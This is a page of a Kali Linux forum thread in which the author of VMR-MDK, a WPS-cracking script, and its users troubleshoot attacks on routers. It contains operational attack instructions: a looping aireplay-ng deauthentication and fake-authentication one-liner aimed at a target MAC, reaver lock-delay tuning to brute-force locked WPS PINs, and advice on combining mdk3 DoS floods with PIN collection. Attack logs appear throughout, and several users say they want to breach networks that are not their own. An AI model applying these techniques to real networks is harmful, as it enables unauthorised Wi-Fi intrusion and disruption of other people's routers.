Page 3 of 5 FirstFirst 12345 LastLast
Results 101 to 150 of 212

Thread: VMR-MDK-K2-011x8.sh for Kali2.0

  1. #101
    Join Date
    2016-Apr
    Posts
    5
    Hey guys im new here and fairly new (2 years) to pentesting routers. I managed to successfully penetrate a few networks last year using both reaver with pixiedust and through dictionary attacks. Recently ive been on the move again and found your awesome tool. I understand that it is intended sprcofocally for locked wps intrusion, however, i seem to have made no progress. The tool is working as it should (tested against a few ap's that i already have the psk for), but for any new ap's, specifically locked ap's, the script doesnt seem to give up any more pins. On top of that, it seems to have locked the ap's for over 48 hour. Is this normal?
    Finally, somebody mentioned earlier in the thread that hey have identified an ap which is listed as unlocked wps, but reaver treats it as though it is locked. I have a similar ap and would LOVE to breach it. It says wps is not locked, but reaver, nor vmr-mdk, manage to get past the initial sending identity response. Have you guys ever encountere a router like this? If so, how did you work around it.
    I believe its a zyxel chipset, 5c:f4:ab

    P.s. awesome that someone released a script to run this process, my fingers were not fast enough!

  2. #102
    Join Date
    2013-Jul
    Posts
    844
    As MTeams notes in the help files the VMR-MDK process only works on a small subset of routers.

    If the routers WPS system is Open but simply not responding. You can try these techniques.

    Method One

    Use varmacscan for a few days

    https://forums.kali.org/showthread.p...released/page5

    Method Two

    If you wish to focus your reaver attack specifically at one target that is not responding use reaver from the command line then:

    Open a second terminal window run this from the command line.

    while true; do aireplay-ng -0 10 -a 55:44:33:22:11:00 mon0; sleep 2; aireplay-ng -1 10 -a 55:44:33:22:11:00 mon0; sleep 5; done

    The mac address here would be the mac address of your target.
    mon0 is your monitor mon0 or wlan0mon etc

    If you get a complete pixiedust data sequence use PDDSA-06.sh. Capture the text from the screen, save to the VARMAC_LOGS directory and check it with PDDSA-06.sh MTeams broke a non respondng router this way two days ago.

    MTeams
    Last edited by mmusket33; 2016-04-29 at 06:04.

  3. #103
    Join Date
    2016-Apr
    Posts
    5
    Great. Thanks for your feedback guys. Ill try this out after work today (already had varmascan running for around 12 hours). The second method is basically a deauth-fakeauth process in aireplay right? Is it worth using a known client mac aswell or shall i just let it go with a random spoof

  4. #104
    Join Date
    2016-May
    Posts
    5
    @mmusket33.

    Thank you very much for your great work!
    I used VMR-MDK script for kali 2016 and it started to collect pins like a charm against a tecnicolor AP 582n.
    The problem is that after a variable amount of pins, reaver count suddently restart from the beginning.
    The access point is always responsive to the attack, but i can't figure out Why reaver count restart.

  5. #105
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    The program has a retest pin 12345670 every x cycles feature. When the program retests it includes a --session= in the reaver command line so the brute force count is not upset. The program will test the pin for 120 seconds and then return to the brute force count on the next cycle.

    Try turning off the retest feature in the configuration file during program setup. Change the y to n. However in the end it is best to use this feature. Read the help files for reasons which include getting a complete pixie dust data sequence.

    The only other way the count can be upset to our knowledge is if you jump between using --dh-small and not using.


    To test turn off the restest pin feature and the brute force count should return to the previous brute force setting. If you still have problems please advise.

    MTeams
    Last edited by mmusket33; 2016-05-18 at 06:18.

  6. #106
    Join Date
    2016-May
    Posts
    5
    Quote Originally Posted by mmusket33 View Post
    To Stem83

    The program has a retest pin 12345670 every x cycles feature. When the program retests it includes a --session= in the reaver command line so the brute force count is not upset. The program will test the pin for 120 seconds and then return to the brute force count on the next cycle.

    Try turning off the retest feature in the configuration file during program setup. Change the y to n. However in the end it is best to use this feature. Read the help files for reasons which include getting a complete pixie dust data sequence.

    The only other way the count can be upset to our knowledge is if you jump between using --dh-small and not using.


    To test turn off the restest pin feature and the brute force count should return to the previous brute force setting. If you still have problems please advise.

    MTeams
    @mmusket33.

    Thank you very much for your prompt reply. :-)
    I already have tried to turn off the retest pin feature yesterday and retest frequency to 99999, but after it collected about 3000 pins it restarted again with 12345670, without storing any previous session. It's really strange, i never modified the --dh-small option so, yesterday l tryed to brutally delete from the script lines from 7287 to 7745 with retest functions.
    Now it collected about 1500 pins, I'll soon let you know soon how it goes.

  7. #107
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    Please keep us advised. We are not encountering this with kali1.1 or 2.0. We do know that for reaver to save its pin count, reaver, has to be shut down in a certain manner. But since your program is saving its pin counts the shutdown procedure works.

    1. What version are you using ?
    2. What type of operating system ie Harddrive Install, Persistent USB, Virtual etc

    We will try and induce this failure.

    Note we do not support any Virtual mode installs or Persistent usb using luks encryption. However hardrive installs and Persistent USB installs are fine. Live installs will not work as you cannot save between reboots.

    MTeams
    Last edited by mmusket33; 2016-05-20 at 05:48.

  8. #108
    Join Date
    2016-May
    Posts
    5
    To mmusket33:

    I use kali-linux-2016.1x64 persitent live usb with LUKS encryption.
    Here are some useful info :

    root@kali:~# uname -a
    Linux kali 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

    root@kali:~# reaver
    Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212

    root@kali:~# mdk3
    MDK 3.0 v6(mod-musket-r1) - "**** the censorship" by ASPj of k2wrlz, using the osdep library from aircrack-ng And with lots of help from the great aircrack-ng community: Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik THANK YOU! MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it. This code is licenced under the GPLv2

    root@kali:~# lspci | grep Network
    02:00.0 Network controller: Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

    root@kali:~/VARMAC_LOGS# cat TNCAPXXXXXX-XXXXXX-XX:XX-XXXXXX Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Switching mon0 to channel 6 [+] p1_index set to 3129 [+] p2_index set to 0 [+] Restored previous session [+] Waiting for beacon from XX:XX:XX:XX:XX:XX [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TNCAPXXXXXX) [+] Starting Cracking Session. Pin count: 3129, Max pin attempts: 11000 [+] Trying pin 31225670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: XX:XX:XX:XX:XX:XX [P] PKE:XX:XX:XX:XX:XX:XX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XX:XX:XX:XX:XX:XX [P] PKR:XX:XX:XX:XX:XX:XX [P] AuthKey: XX:XX:XX:XX:XX:XX [+] Sending M2 message [P] E-Hash1: XX:XX:XX:XX:XX:XX [P] E-Hash2: XX:XX:XX:XX:XX:XX [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] p1_index set to 3130 [+] Pin count advanced: 3130.
    --------------------------------------------------------
    [+] Pin count advanced: 3136. Max pin attempts: 11000 [+] Trying pin 31295673. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: XX:XX:XX:XX:XX:XX [P] PKE: XX:XX:XX:XX:XX:XX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XX:XX:XX:XX:XX:XX [P] PKR:XX:XX:XX:XX:XX:XX [P] AuthKey: XX:XX:XX:XX:XX:XX [+] Sending M2 message

    root@kali:~/VARMAC_CONFIG# cat TNCAPXXXXXX-XXXXXXXXXXXX
    ###========================= CHANNEL1=6 ###========================= ###========================= USE_R1=y ###=========================
    ###=========================
    RX1=9
    RY1=2
    ###=========================
    ###========================= LIVE1=240 ###=========================
    ###========================= USE_LONG1=y ###=========================
    ####========================= MDKTYPE1=3 ####========================= ###========================= MDKLIVE=1 ###======================= ###========================= PAUSE=1 ###========================= ###========================= REAVER_COUNT=y ###=========================
    ###========================= MDK3_COUNT=y ###========================= ###========================= WASH_COUNT=y ###=========================
    ###========================= DAMP_MDK=y ###========================= ###========================== ADVAN_TIME=120 ###========================= ###========================= USE_AIRE1=y ###========================= ###========================= USE_AIRE0=n ###========================= ###========================= USE_DHSMALL=y ###========================= ###========================= MACSEL=n ###========================= ###========================= ASSIGN_MAC=XX:XX:XX:XX:XX:XX ###========================= ###========================= USE_PIXIE=n ###========================= ###========================= USE_FIRSTPIN=n ###========================= ###========================= RETESTPIN=999999 ###=========================
    Last edited by g0tmi1k; 2018-02-13 at 13:19. Reason: use of coarse language in output

  9. #109
    Join Date
    2013-Jul
    Posts
    844
    To Stem 83

    Thanks for the info:

    First you might set the
    RETESTPIN=50

    As we never tested such a long cycle. But we doubt the problem is there.

    VMR-MDK was developed against real targets using kali-i386. It has never been tested using AMD or luks encryption.

    MTeams tried luks encryption but the encryption process took too long to complete causing other program processes to fail. We remove the encryption feature and programs ran normally again. So if we were to take a guess, the problem is there.

    Suggest you make a persistent usb install of kali not using luks and maybe not amd and see what occurs. If you can just turn off luks try that. We gave up on luks a while ago. We know nothing about AMD.


    MTeams

  10. #110
    Join Date
    2016-May
    Posts
    1
    Heloo Mteam,

    I have been trying to crack a wps locked router and have been trying ur script for past few weeks and always get a same error
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping... and it goes on
    i gt this line after i specify mon0

    I have not installed kali on my windows i am live booting it from my pendrive version : kali-linux-2016.1-amd64.iso
    I have Dell Inspiron N4030 WITH INTEL i3 processor
    Network card : BCM43XX

    Please help me out

  11. #111
    Join Date
    2016-May
    Posts
    5
    Quote Originally Posted by mmusket33 View Post
    To Stem 83

    Thanks for the info:

    First you might set the
    RETESTPIN=50

    As we never tested such a long cycle. But we doubt the problem is there.

    VMR-MDK was developed against real targets using kali-i386. It has never been tested using AMD or luks encryption.

    MTeams tried luks encryption but the encryption process took too long to complete causing other program processes to fail. We remove the encryption feature and programs ran normally again. So if we were to take a guess, the problem is there.

    Suggest you make a persistent usb install of kali not using luks and maybe not amd and see what occurs. If you can just turn off luks try that. We gave up on luks a while ago. We know nothing about AMD.


    MTeams
    To mmusket33.

    Thank you for the advice, I'll give a try and let you know. But there is any way to keep pins already tested? Are they stored in the default /etc/reaver folder?

  12. #112
    Join Date
    2013-Jul
    Posts
    844
    To Stem83

    To find where your .wpc files are stored try typing:

    locate .wpc

    The storage folder moved around when the first pixiedust moded reaver programs were installed over the existing reaver but current versions store in the /etc/reaver folder as you note or maybe /usr/local/etc/reaver.

    As you can see the .wpc file is just a mac address stripped of colons. You could copy the file to another folder or copy to existing folder and place an XX at the beginning.

    To avoid conflict in the VMR-MDK series when the --pin= command is used a --session= command to another location to include using a text string at the beginning of the file name is included in the command line to avoid any later brute force session using the file. So even if reaver sends the --session files to the same folder thru internal default it cannot use them for any brute force sessions as there is a text string at the beginning. If you see a file testpin- or startpin- these were written by the --session= command when a specific pin is used or the default pin is tested.

    We will run some tests on wpc storage of session files again and see what occurs.
    Last edited by mmusket33; 2016-05-21 at 09:57.

  13. #113
    Join Date
    2015-Aug
    Posts
    15
    Is it possible to run this on arm-64 bit?
    I'm running kali rolling on odroid c2 with 64-bit cpu.
    Thank you!
    root@kali-arm64:~/mdk3-v6# make
    make -C osdep
    make[1]: Entering directory '/root/mdk3-v6/osdep'
    Building for Linux
    make[2]: Entering directory '/root/mdk3-v6/osdep'
    make[2]: '.os.Linux' is up to date.
    make[2]: Leaving directory '/root/mdk3-v6/osdep'
    make[1]: Leaving directory '/root/mdk3-v6/osdep'
    root@kali-arm64:~/mdk3-v6# make install
    make -C osdep install
    make[1]: Entering directory '/root/mdk3-v6/osdep'
    Building for Linux
    make[2]: Entering directory '/root/mdk3-v6/osdep'
    make[2]: '.os.Linux' is up to date.
    make[2]: Leaving directory '/root/mdk3-v6/osdep'
    make[1]: Leaving directory '/root/mdk3-v6/osdep'
    install -D -m 0755 mdk3 //usr/local/sbin/mdk3
    root@kali-arm64:~/mdk3-v6# /root/mdk3-v6/mdk3
    -bash: /root/mdk3-v6/mdk3: cannot execute binary file: Exec format error

  14. #114
    Join Date
    2016-May
    Posts
    5
    To mmusket33.

    The mistery continue..
    As you suggested I used kali 2.0 i386 persistent USB WITHOUT LUKS encryption and pin count advanced without restarts as expected, but after some days of work i had this unexpected log:

    Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Switching mon0 to channel 1 [+] p1_index set to 6904 [+] p2_index set to 999 [+] Restored previous session [+] Waiting for beacon from XX:XX:XX:XX:XX:XX [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TNCAPXXXXXX) [+] Starting Cracking Session. Pin count: 10999, Max pin attempts: 11000 [+] Trying pin 69019982. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKE: XXXXXXXXXXXXXXXXXXXX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKR: XXXXXXXXXXXXXXXXXXXX [P] AuthKey: XXXXXXXXXXXXXXXXXXXX [+] Sending M2 message [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [+] p2_index set to 1000 [+] Pin count advanced: 11000. Max pin attempts: 11000 [+] Checksum mode was not successful. Starting exhaustive attack [+] p2_index set to 0 [+] Trying pin 69011234. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKE: XXXXXXXXXXXXXXXXXXXX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKR: XXXXXXXXXXXXXXXXXXXX [P] AuthKey: XXXXXXXXXXXXXXXXXXXX [+] Sending M2 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX [+] Received M3 message [+] Sending M4 message [+] Session saved.

    And p2 index restarted from 0.
    I'm a Little bit confused now ..What it means exhaustive attack? And, according the log file it discovered only the first part (6901) of the pin right?

  15. #115
    Join Date
    2013-Jul
    Posts
    844
    To sslx

    MTeams does not use arm hence we cannot test. Furthermore our weekly HD test install of Kali-rolling seems to finally been successful after update/upgrade so we will recommence work with the Operating System.

    To Stem83

    It looks like removing the luks has stopped the pin count restart. You have simply checked all the WPS pins. The only thing we could do in this case is:

    1. Restart the attack from the beginning. Remove the -a from the reaver command line and you should get asked if you want to restart.

    2. Try Kali 1.10a and reaver 1.3 we have found the older program sometimes works better. We used to keep a persistent usb install using reaver 1.3 for such cases.

    Reaver 1.3 was available search the web for the download page and install instructions.

    Note in reaver 1.3 wash is called something else maybe walsh and you will have to use airodump-ng to obtain the channel.

    MTeams
    Last edited by mmusket33; 2016-05-26 at 23:21.

  16. #116
    I gota error, and o need a help ti solve this.

    Enter Line Number of Selected TargetAP Here: 1




    You have chosen:

    1. xxxxxxxxx as the targetAPs' name.

    2. xxxxxxxxx as the targetAPs' mac address.

    Enter (y/Y) to confirm or (n/N) to try again.
    Y
    ./VMR-MDK-K2-2016R-011x9.sh: line 666: /root/VARMAC_CONFIG/configfiledetailed: Arquivo ou diretório não encontrado
    ./VMR-MDK-K2-2016R-011x9.sh: line 673: /root/VARMAC_CONFIG/xxxxxx-xxxxxxx: Arquivo ou diretório não encontrado

    ls: não é possÃ*vel acessar /root/VARMAC_CONFIG: Arquivo ou diretório não encontrado

    Configuration files listed in the VARMAC_CONFIG folder.



    Select the config file to be used.
    A Configuration file xxxxxxxxxx-xxxxxxxx has been made for use
    with this target BUT any config file listed can be used.
    After selection the config file parameters will appear. You can review
    settings and make changes which will be written to the file choosen.

    Once the program is running, open the config file with leafpad,
    make any changes and save. The config file is loaded at the start of
    Stages II, III & IV.

    Enter Line Number of Config File Here:



    You have chosen as your configuration file.
    Enter (y/Y) to confirm or (n/N) to try again.
    y
    ./VMR-MDK-K2-2016R-011x9.sh: line 1142: /root/VARMAC_CONFIG/: Arquivo ou diretório não encontrado
    Arquivo ou diretório não encontrado = File or directory not found
    Não é possÃ*vel acessar =is not possible to access


    How o solve this?

  17. #117
    Join Date
    2013-Jul
    Posts
    844
    To renan*

    MTeams looked at your problem. For some reason the config file is not being written to the folder. It is possible your script is corrupted as all these processes are automatic. If you are using one of the Spanish versions it is possible it got altered. MTeams corrected a previous version.


    Go thru the setup very carefully. You should see your config file in a drop down menu list.

    MTeams

  18. #118
    Join Date
    2015-May
    Posts
    25
    To Renan,

    Even I was facing the same issue,

    You can fix this by copying all the folder that VMR-MDK creates for example VARMAC_CONFIG, LOGS etc

    and paste them to root/home folder and then run the script. I hope this helps.

  19. #119
    Join Date
    2016-Jun
    Posts
    6
    I'am Also Facing Some Problems On Kali 2016 i cant get this script to work ive read everything even after 3 hours of searching for some reason it doesn't scan for networks or show me the airodump and wash tabs would realy apreciate some help thanks !

  20. #120
    Join Date
    2016-Jun
    Posts
    3

    Question Script not resuming--

    I'm having pretty much the same problem, I installed it successfully tho but the script stops at:

    usage: VMR-MDK-K2-2016R-011x9.sh <start|stop|check> <interface> [channel or frequency]"

    It seemed to me that the script isn't resuming as how it should.

    And also 2 questions, first, does installing the mdk3 required/mandatory?
    second, do you suggest to have multiple wlan adapters to use? if yes, please recommend to me the latest and greatest in the range of $50 and below.

    Would appreciate the reply to be here or to my email: [email protected]

    Thank you very much!

  21. #121
    Join Date
    2016-Jun
    Posts
    6
    i got the script working after restarting my computer but i got the same issue now like described above me and thanks for all the help realy apreciate it !
    Last edited by YssDiamond; 2016-06-26 at 19:19.

  22. #122
    Join Date
    2013-Jul
    Posts
    844
    To marsrolled and YssDiamond

    A common error with VMR-MDK by users is when asked to enter the device the user types the device ie wlan0 rather then the line number of the device seen in the menu list of devices.

    Suggest carefully going thru the set up.


    Loading the modified version of mdk3 is not mandatory. This version is loaded to a folder in root and the VMR-MDK program will run that version if you select item 14 in the DDOS series. All other DDOS using mdk3 run from the installed version that comes with kali-linux.

    Reference wifi devices - MTeams is in no way any authority here and are NOT qualified to recommend any devices. We use AWUSO36H it works for us. There are however alot of commentary in these forums on other devices. Suggest you post your question there and some forum member may assist you.

  23. #123
    Join Date
    2016-Jun
    Posts
    6
    thanks for the quick reply i managed to get it to work when i had to choose if i wanted to use wlan0 or mon0 wlan0 didnt work for and only mon0 worked for me @ marsrolled i suggest you to try mon0 instead of wlan0 and the other good news is varmacscan is also working now for some weird reason thanks to you musket and marsrolled if u need any help just message me or reply here and ill try to help you !

  24. #124
    ive made anoda episode of my vmr series , showing u continuity, received a lot of complains from youtube dat d script doesnt continue,and some oda ish.
    visit youtube and search for "how to hack wps locked routers using vmr-mdk part 2".
    hope u enjoy it,
    please like share and subscribe.

  25. #125
    Join Date
    2015-May
    Posts
    25
    Hi Chunkinz,

    Saw the video and thank you for your efforts

    Just wanted to ask you that you attacked unlocked WPS router, How about routers which are already locked, when you do a wash scan and WPS shows locked shows as YES, can we still use VMR-MDK to crack it? I have routers which automatically locks after 5 -6 failed WPS PIN tries. Please help! thanks

  26. #126
    Join Date
    2015-May
    Posts
    25
    Hi All,

    First of all thanks for this lovely script, but there are some concerns that I would like to point out.

    I dont know if this is normal or not, coz the attack is not suucessful.

    Here are my observation:

    So after running VMR-MDK-K2-2016R-011x9 script on my router TP Link WR740N

    USB wireless adapter= TP Link WN722N
    Kali Linux 2016 roling
    All updated

    Here are the results

    All settings as default with interface selected as Mon0


    ATTEMPT 1
    setting default as the script

    reaver result:
    p2 index set to 2
    10002
    90.95% complete

    aireplay-ng reception test= association successful AID: 1


    Client associated=yes
    EAPOL Flood attack

    wash WPS locked = NO

    ATTEMPT 2

    Reaver start/stop cycles remaining = 999
    p1 index set to 3
    pin count advanced 3
    0.03% complete
    WPS transaction failed code 0x0

    aireplay-ng reception test: association successful AID: 1

    Wash WPS locked= YES

    client associated= yes

    ATTEMPT 3

    Reaver= Warning: receive timeout occured and continues
    Sending EAPOL start request

    aireplay-ng reception test= association successful AID: 1

    Wash WPS locked= YES

    client associated= yes

    ATTEMPT 4

    WPS transaction failed code 0x04
    0.03% complete
    sending EAPOl start request
    trying PIN 1115670

    aireplay-ng reception test= association successful AID: 1

    client associated= yes, 2
    MDK3 DOS 1 and 2 = client still responding with 1500 packets

    Wash WPS locked=YES

    ATTEMPT 5

    Reaver start/stop cycles remaining = 996

    Reaver:
    Warning: receive timeout occured and continues
    sending EAPOl start request ( cycle continues)

    aireplay-ng reception test= association successful AID: 1

    Wash WPS locked= YES
    WPS not found
    2 clients still connected

    Router stop responding
    default router page doesnt open up
    Restarted the router finally


    Please advice.

    Thanks.
    Last edited by machx; 2016-06-29 at 18:35.

  27. #127
    Join Date
    2013-Jul
    Posts
    844
    Reference the use of the VMR-MDK script.

    1. VMR-MDK is only effective against a SMALL number of routers.

    2. Users should read the help files before employing.

    3. Procedure for testing for the flaw are outlined there.


    Reference the attack outlined by machx

    ATTEMPT 1

    Reaver is running the default pin 12345670 attack

    Attempt 2

    Reaver starts the brute force attack against a the WPS system. Status of WPS unclear but pin count increased.

    ATTEMPT 3 thru 5

    Router appears partially locked

    If the router provides more pins after resetting then this approach may work.

    If the router stays locked and no more pins collected the VMR-MDK approach will not work.

    Suggestion if VMR-MDK does not work

    Test to see if the router automatically unlocks the WPS system after x number of seconds

    From the command line(CL) run reaver

    Make sure the -L is NOT in the CL.

    Add the -l or --lock-delay to 100 "Set the time to wait if AP locks WPS pin attempt"

    With a -l 100 reaver will attempt to collect pins every 100 seconds.

    Run reaver and wait. If pin collection restarts just count the number of times reaver attempts to collect pins before pin count restarts.

    For example if reaver tries 10 times before pin count retarted then 100 times 10 = 1000 seconds.

    Now set your -l to 1200 run reaver from the CL and sit back.

    You can tweak the 1200 lower if the attack develops a pattern.


    MTeams

  28. #128
    Join Date
    2015-May
    Posts
    25
    Thank you MTeam,

    I was wishing that you could take a look at my post, and you did.

    Thank you for your advice.

    I have observed that the router TP-Link WR740N is not vulnerable against this script.

    After the DOS attack 1 and 2 , the router stops responding to any devices.

    Router page doesn't show up, You have to manually restart the router.

    Even after restarting the router the PIN doesn't disable. You have to manually disable the PIn if you want to continue with the attack.

    The question is: If I install the old script which is VMR-MDK011x8 for Kali 1.1.0, will it work better than the new script on Kali 2016 rolling.

    I have heard that this script gives false results on most Kali 2016 rolling edition..

    Please advice MTeam.

    Thank you.

  29. #129
    Join Date
    2013-Jul
    Posts
    844
    Reference VMR-MDK011x8, this script cannot be run in kali2.0 and 2016

    As for false results MTeams is unsure which program is providing false results. MTeams has never seen any problems with the latest version.

    We do get allot of commentary about pin counts but this is because users do not read carefully the retest pin feature. Furthermore during setup many users input the wrong data causing the program to fail. If you youtube VMR-MDK you will find a new video that states VMR-MDK doesnot work because the user tested it against three routers. MTeams has no objection to the user stating the program was not effective against the routers attacked however during the setup the user input incorrect setup info.

    VMR-MDK is a administrative script. It just runs various processes already installed in robotic fashion. Most of the newer scripts changes deal with avoiding network manager problems and handling differences in text output.

    If you have info on false results please provide details. We use the script all the time with both 1.1 2.0 and 2016 and have seen no problems. Normally if the router locks we run up VMR-MDK and see if the flaw exists. If the attack collects pins we continue if not we try other tactics. VMR-MDK is just one small tool in the WPA Tool Box.

    In closing we have heard the Network Manager problems are finally being addressed and will eventually filter down to users.
    Last edited by mmusket33; 2016-06-30 at 14:25.

  30. #130
    Join Date
    2015-May
    Posts
    25
    Thank you for your advice.

    Could you let me know the settings you are using from 1 - 22

    I have tried to switch setting 22 to N,

    Thank you M team.

    The settings that your team use and proven to be successful, we can try and test on our routers and tweak a bit to get the bets out of it.

  31. #131
    Join Date
    2016-Jun
    Posts
    3

    Reply

    To mmusket33:
    ----Yep I rest assured that I typed the number associated with the adapter we used. But after a few tests, i found out that the adapter im using is a weak packet capturer and sender to the point that it barely sends packets, I think that's one big contributor to why im failing. Im getting an adapter in a few weeks after i get my paycheck. I'd also consider if it will work on the router I'm testing on and move on to the next if I'm failing. Also, how many wlan adapters do u suggest using on this particular tool? Thank you for replying, you're one good samaritan! We appreciate the tools you make! =)

    To YssDiamond:
    ----Thanks bro, but isn't mon0 the ethernet wired connection tho? Because I only have one wireless adapter but anyways ill give it a shot! And do you know the dlink-605L router? Just wanna know if u encountered one cause thats the router im currently testing. Kinda sensitive cause it took me only 5-7 attempts before it locked. And also, how many wlan adapters r u using?

  32. #132
    Join Date
    2013-Jul
    Posts
    844
    To machx

    Choosing 22 = n just removes the default pin recheck,

    If 22 = y/Y then the program runs two concurrent reaver attacks. A brute force attack checking all 11,000 WPS pins and occasionally a separate check of pin 12345670.

    If was found that some routers would reset their WPS system to 12345670 if subjected to constant DOS processes. If reaver had already checked this key at the very start of the attack reaver would slowly check all the pins climb to 99.99% and spin endlessly. If the attack was restarted the WPS pin and WPA key would be found and the key was always 12345670.

    If was also found that routers which never responded to any attempts to obtain pins for days would suddenly dump their WPS pin and WPA key. The key was always 12345670 then go back to being inert.

    To marsrolled

    The script only supports one adapter. MTeams sees no reason to use two. We tried DDOS with one adapter and trying to collect pins with a second device but that never worked. We tried DDOS at the same time as running reaver with one adapter and to our surprise reaver could collect pins through the DDOS fog if the adapter conducted both operations. That approach probably needs to be looked at again.

    MTeams

  33. #133
    Join Date
    2015-May
    Posts
    25
    To Mmusket33,

    To be honest, Kali 2016 rolling is not great.

    Because, the routers I could easily crack within seconds with Wifite with Kali 2.0 Sana.

    Kali Rolling 2016, same version of Wifite R87, could not get the WPS PIN. Even after taking the router and the wireless adapter next to each other.

    That's kind of funnny, because I guess there is something wrong with Kali Rolling.

    So I rolled back to Kali 2.0 Sana and Wifite cracks routers like a dream now.

    I hope Kali 2.0 Sana is supported further more over the years.

    I'm updating Kali 2.0 Sana, and I heard lot of great success with this version of Kali.

    I will use VMR-MDk on this version again and get back to you with updates.

    Thank you Mteam for your support.

  34. #134
    Join Date
    2016-Jul
    Posts
    1

    I can't unlock the router.

    Quote Originally Posted by mmusket33 View Post
    To machx

    Choosing 22 = n just removes the default pin recheck,

    If 22 = y/Y then the program runs two concurrent reaver attacks. A brute force attack checking all 11,000 WPS pins and occasionally a separate check of pin 12345670.

    If was found that some routers would reset their WPS system to 12345670 if subjected to constant DOS processes. If reaver had already checked this key at the very start of the attack reaver would slowly check all the pins climb to 99.99% and spin endlessly. If the attack was restarted the WPS pin and WPA key would be found and the key was always 12345670.

    If was also found that routers which never responded to any attempts to obtain pins for days would suddenly dump their WPS pin and WPA key. The key was always 12345670 then go back to being inert.

    To marsrolled

    The script only supports one adapter. MTeams sees no reason to use two. We tried DDOS with one adapter and trying to collect pins with a second device but that never worked. We tried DDOS at the same time as running reaver with one adapter and to our surprise reaver could collect pins through the DDOS fog if the adapter conducted both operations. That approach probably needs to be looked at again.

    MTeams

    I am not as pro as ya'll guys but i tried unlocking router with the help of your script it aint trying a single pin. from the starting of the program it says " AP RATE LIMITING"
    i've tried all 15 MDK attacks but router is still locked in wash. and reaver can not brute force a single pin. any suggestion ? please pardon me for my lack of knowledge in this field.
    Last edited by sohilmalvat; 2016-07-20 at 07:50.

  35. #135
    hi! mmusket33, I' m problem with ESSID characters specials type eg. ">>>LIDIO<<<" and "Arte&Papel" It is to fix it? I tried to edit the script VMR-MDK-K2_2016R-011x9.sh I not found the line to correct. Not create file of log in VARMACS_LOGS.
    thanks.
    Last edited by dmatrix; 2016-07-24 at 17:45.

  36. #136
    Join Date
    2013-Jul
    Posts
    844
    To: sohilmalvat

    The readme files note that the VMR-MDK approach only works with a small subset of routers. Suggest you consult the suggestions found in the readme on how to test for this vulnerability.

    MTeams

  37. #137
    Join Date
    2013-Mar
    Posts
    1
    quick question gentlemen and ladies, during the wash stage, i am getting bad fcs on the wash window, would it be feasible to add the '--ignore-fcs' line to the wash script? if not, how do you solve this dilemma? thanks y'all

  38. #138
    Join Date
    2016-Aug
    Posts
    1
    WPS transaction failed (code: 0x04) please help me !!!

    vmr-mdk 0x04 fail.jpg

  39. #139
    Join Date
    2016-Sep
    Posts
    3
    I'm getting the exact same problem and I can't figure it out for the life of me. I've followed the steps both assuming that root is the home folder and root is ./ I first tried it running Kali Live USB with 2016.1r, and then I tried installing thinking it wasn't taking. Both of those failed, so I tried Kali Live USB 2.0 Sana, and that failed also, I'm at my wits end! The following are the responses I get no matter what I try:

    bash: ./mdk3-v6/mdk3: No such file or directory

    bash: /root/mdk3-v6/mdk3: No such file or directory

    what am I doing wrong?

  40. #140
    Join Date
    2013-Jul
    Posts
    844
    You should not try and run this program from a live usb. Either use a hard drive install or a persistent usb. Do not try and run a usb with luks encryption

    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams

  41. #141
    Join Date
    2016-Sep
    Posts
    3
    Quote Originally Posted by mmusket33 View Post
    You should not try and run this program from a live usb. Either use a hard drive install or a persistent usb. Do not try and run a usb with luks encryption

